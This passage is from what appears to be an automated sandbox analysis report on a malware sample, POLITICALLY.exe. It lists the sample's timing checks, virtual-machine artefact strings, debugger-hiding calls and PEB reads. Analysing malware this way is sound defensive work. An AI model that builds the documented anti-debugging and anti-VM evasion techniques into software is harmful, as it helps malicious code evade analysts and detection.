Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228953 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000016 jmp 00007FDAB4B9AB29h 0x0000001b test ecx, 375658D5h 0x00000021 call 00007FDAB4B9AC71h 0x00000026 call 00007FDAB4B9AA18h 0x0000002b lfence 0x0000002e mov edx, dword ptr [7FFE0014h] 0x00000034 lfence 0x00000037 ret 0x00000038 mov esi, edx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D11 second address: 0000000002228D11 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FDAB47B2AF8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f jmp 00007FDAB47B2C0Dh 0x00000024 cmp eax, eax 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007FDAB47B29BDh 0x00000039 call 00007FDAB47B2D61h 0x0000003e call 00007FDAB47B2B08h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000002228D31 second address: 0000000002228D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB4B9D341h 0x0000001d popad 0x0000001e call 00007FDAB4B9B24Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 0000000000578D31 second address: 0000000000578D31 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FDAB47B5431h 0x0000001d popad 0x0000001e call 00007FDAB47B333Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\POLITICALLY.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02213269 rdtsc 2_2_02213269
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.529944800.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000013.00000002.607237915.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: POLITICALLY.exe, 0000000A.00000003.497685279.00000000008D9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: POLITICALLY.exe, 00000002.00000002.415503027.0000000002240000.00000004.00000001.sdmp, POLITICALLY.exe, 0000000A.00000002.546748733.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.529285568.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000013.00000000.529987531.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000013.00000000.524426505.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\POLITICALLY.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\POLITICALLY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\POLITICALLY.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02213269 rdtsc 2_2_02213269
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02221066 LdrInitializeThunk, 2_2_02221066
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02219212 mov eax, dword ptr fs:[00000030h] 2_2_02219212
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222C0B8 mov eax, dword ptr fs:[00000030h] 2_2_0222C0B8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02219102 mov eax, dword ptr fs:[00000030h] 2_2_02219102
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222C1F4 mov eax, dword ptr fs:[00000030h] 2_2_0222C1F4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222767D mov eax, dword ptr fs:[00000030h] 2_2_0222767D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_022197E8 mov eax, dword ptr fs:[00000030h] 2_2_022197E8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_022197DF mov eax, dword ptr fs:[00000030h] 2_2_022197DF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222440F mov eax, dword ptr fs:[00000030h] 2_2_0222440F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222C444 mov eax, dword ptr fs:[00000030h] 2_2_0222C444
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02217A2E mov eax, dword ptr fs:[00000030h] 2_2_02217A2E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02219917 mov eax, dword ptr fs:[00000030h] 2_2_02219917
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222BFB8 mov eax, dword ptr fs:[00000030h] 2_2_0222BFB8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221CD2F mov eax, dword ptr fs:[00000030h] 2_2_0221CD2F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23E620 mov eax, dword ptr fs:[00000030h] 10_2_1E23E620
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EFE3F mov eax, dword ptr fs:[00000030h] 10_2_1E2EFE3F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h] 10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h] 10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h] 10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E268E00 mov eax, dword ptr fs:[00000030h] 10_2_1E268E00
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1608 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1608
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h] 10_2_1E26A61C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h] 10_2_1E26A61C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24766D mov eax, dword ptr fs:[00000030h] 10_2_1E24766D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAE44
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAE44
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B46A7 mov eax, dword ptr fs:[00000030h] 10_2_1E2B46A7
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CFE87 mov eax, dword ptr fs:[00000030h] 10_2_1E2CFE87
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2616E0 mov ecx, dword ptr fs:[00000030h] 10_2_1E2616E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2476E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2476E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E278EC7 mov eax, dword ptr fs:[00000030h] 10_2_1E278EC7
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308ED6 mov eax, dword ptr fs:[00000030h] 10_2_1E308ED6
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2636CC mov eax, dword ptr fs:[00000030h] 10_2_1E2636CC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h] 10_2_1E2EFEC0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h] 10_2_1E234F2E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h] 10_2_1E234F2E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26E730 mov eax, dword ptr fs:[00000030h] 10_2_1E26E730
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h] 10_2_1E26A70E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h] 10_2_1E26A70E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25F716 mov eax, dword ptr fs:[00000030h] 10_2_1E25F716
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h] 10_2_1E2CFF10
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h] 10_2_1E2CFF10
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h] 10_2_1E30070D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h] 10_2_1E30070D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24FF60 mov eax, dword ptr fs:[00000030h] 10_2_1E24FF60
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308F6A mov eax, dword ptr fs:[00000030h] 10_2_1E308F6A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24EF40 mov eax, dword ptr fs:[00000030h] 10_2_1E24EF40
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E248794 mov eax, dword ptr fs:[00000030h] 10_2_1E248794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2737F5 mov eax, dword ptr fs:[00000030h] 10_2_1E2737F5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26BC2C mov eax, dword ptr fs:[00000030h] 10_2_1E26BC2C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h] 10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h] 10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h] 10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25746D mov eax, dword ptr fs:[00000030h] 10_2_1E25746D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A44B mov eax, dword ptr fs:[00000030h] 10_2_1E26A44B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h] 10_2_1E2CC450
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h] 10_2_1E2CC450
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24849B mov eax, dword ptr fs:[00000030h] 10_2_1E24849B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F14FB mov eax, dword ptr fs:[00000030h] 10_2_1E2F14FB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308CD6 mov eax, dword ptr fs:[00000030h] 10_2_1E308CD6
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308D34 mov eax, dword ptr fs:[00000030h] 10_2_1E308D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23AD30 mov eax, dword ptr fs:[00000030h] 10_2_1E23AD30
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FE539 mov eax, dword ptr fs:[00000030h] 10_2_1E2FE539
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2BA537 mov eax, dword ptr fs:[00000030h] 10_2_1E2BA537
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h] 10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h] 10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h] 10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h] 10_2_1E25C577
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h] 10_2_1E25C577
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E273D43 mov eax, dword ptr fs:[00000030h] 10_2_1E273D43
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B3540 mov eax, dword ptr fs:[00000030h] 10_2_1E2B3540
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2E3D40 mov eax, dword ptr fs:[00000030h] 10_2_1E2E3D40
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E257D50 mov eax, dword ptr fs:[00000030h] 10_2_1E257D50
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2635A1 mov eax, dword ptr fs:[00000030h] 10_2_1E2635A1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h] 10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h] 10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h] 10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h] 10_2_1E3005AC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h] 10_2_1E3005AC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h] 10_2_1E26FD9B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h] 10_2_1E26FD9B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h] 10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h] 10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
